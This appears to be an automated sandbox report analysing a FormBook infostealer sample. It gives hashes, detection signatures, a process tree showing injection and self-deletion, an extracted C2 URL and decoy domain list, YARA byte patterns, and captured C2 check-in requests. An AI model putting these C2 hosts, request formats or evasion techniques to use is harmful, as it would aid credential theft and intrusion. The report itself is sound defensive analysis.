Windows Analysis Report
GV8EJooYMIgEnEk.exe

Overview

General Information

Sample Name: GV8EJooYMIgEnEk.exe
Analysis ID: 562399
MD5: cf6d4fd3dc8e4751b7f89f857b618ef3
SHA1: 15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
SHA256: 9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • GV8EJooYMIgEnEk.exe (PID: 6024 cmdline: "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" MD5: CF6D4FD3DC8E4751B7F89F857B618EF3)
    • GV8EJooYMIgEnEk.exe (PID: 1012 cmdline: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe MD5: CF6D4FD3DC8E4751B7F89F857B618EF3)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5924 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6380 cmdline: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
{"C2 list": ["www.cottoneworld.com/cbgo/"], "decoy": ["tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com", "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com", "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com", "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com", "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store", "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz", "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com", "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com", "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com", "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro", "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com", "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com", "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com", "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com", "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online", "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"]}
Source | Rule | Description | Author | Strings
0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source | Rule | Description | Author | Strings
3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
No Sigma rule has matched

AV Detection

Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.cottoneworld.com/cbgo/"], "decoy": ["tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com", "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com", "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com", "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com", "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store", "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz", "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com", "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com", "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com", "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro", "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com", "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com", "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com", "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com", "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online", "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"]}
Source: GV8EJooYMIgEnEk.exe | Virustotal: Detection: 60%
Source: GV8EJooYMIgEnEk.exe | Metadefender: Detection: 20%
Source: GV8EJooYMIgEnEk.exe | ReversingLabs: Detection: 62%
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: www.cottoneworld.com/cbgo/ | Avira URL Cloud: Label: malware
Source: http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf | Avira URL Cloud: Label: malware
Source: GV8EJooYMIgEnEk.exe | Joe Sandbox ML: detected
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: GV8EJooYMIgEnEk.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: GV8EJooYMIgEnEk.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: chkdsk.pdbGCTL | source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: chkdsk.pdb | source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: StructuralEqualityCompar.pdb | source: GV8EJooYMIgEnEk.exe
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop edi

Networking

Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
Source: C:\Windows\explorer.exe | Network Connect: 166.88.62.202 80
Source: C:\Windows\explorer.exe | Domain query: www.casatowerofficial.com
Source: C:\Windows\explorer.exe | Domain query: www.bitconga.com
Source: C:\Windows\explorer.exe | Domain query: www.totalwinerewards.com
Source: C:\Windows\explorer.exe | Network Connect: 199.59.243.200 80
Source: C:\Windows\explorer.exe | Domain query: www.tothelaundry.com
Source: C:\Windows\explorer.exe | Domain query: www.omnipets.store
Source: C:\Windows\explorer.exe | Network Connect: 46.252.151.235 80
Source: C:\Windows\explorer.exe | Network Connect: 18.231.72.25 80
Source: C:\Windows\explorer.exe | Domain query: www.webarate.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.experiencedlawfirms.com
Source: Malware configuration extractor | URLs: www.cottoneworld.com/cbgo/
Source: Joe Sandbox View | ASN Name: ASSUPERNOVAIT ASSUPERNOVAIT
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: global traffic | HTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1 | Host: www.experiencedlawfirms.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1 | Host: www.totalwinerewards.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1 | Host: www.casatowerofficial.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1 | Host: www.bitconga.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1 | Host: www.omnipets.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.243.200 199.59.243.200
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 28 Jan 2022 19:59:53 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61f22041-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 28 Jan 2022 20:00:09 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61f22041-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
